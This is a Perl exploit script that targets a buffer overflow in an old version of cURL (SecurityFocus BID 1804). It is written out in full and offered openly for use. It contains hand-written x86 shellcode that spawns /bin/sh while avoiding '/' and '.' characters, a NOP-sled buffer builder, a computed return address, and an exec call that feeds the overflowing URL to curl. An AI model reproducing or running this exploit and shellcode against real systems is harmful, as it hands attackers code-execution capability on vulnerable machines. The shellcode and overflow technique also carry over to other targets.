#!/usr/bin/perl
#
# Written by zillion (at safemode.org)
# 
# cURL buffer overflow exploit 
# http://online.securityfocus.com/bid/1804
#
# While this exploit may not be of any use to most people I decided to write it
# anyway ;-) The shellcode does an execve of /bin/sh and does not contain
# and '/' or '.' characters. Instead I used '1bin1sh' and dec'd the '1' chars
# twice. The two extra nops at the end of the shellcode are placed there because 
# the buffer is altered on that location during runtime or cURL.  
#

$shellcode = 
        "\xeb\x24\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46".
        "\x0c\xfe\x4e\x04\xfe\x0e\xfe\x0e\xfe\x4e\x04\xb0\x0b\x89\xf3".
        "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xd7\xff\xff\xff\x31\x62".
        "\x69\x6e\x31\x73\x68\x90\x90";


$offset  = "-200"; 
$esp     = 0xbffffa50;

for ($i = 0; $i < (262 - (length($shellcode)) - 4); $i++) {
    $buffer .= "\x90";
}

$buffer .= $shellcode;
$buffer .= pack('l', ($esp + $offset)); 

$test = length($buffer);
print "Length: $test\n";

print("The new return address: 0x", sprintf('%lx',($esp + $offset)), "\n");

exec("./curl 'http://$buffer'");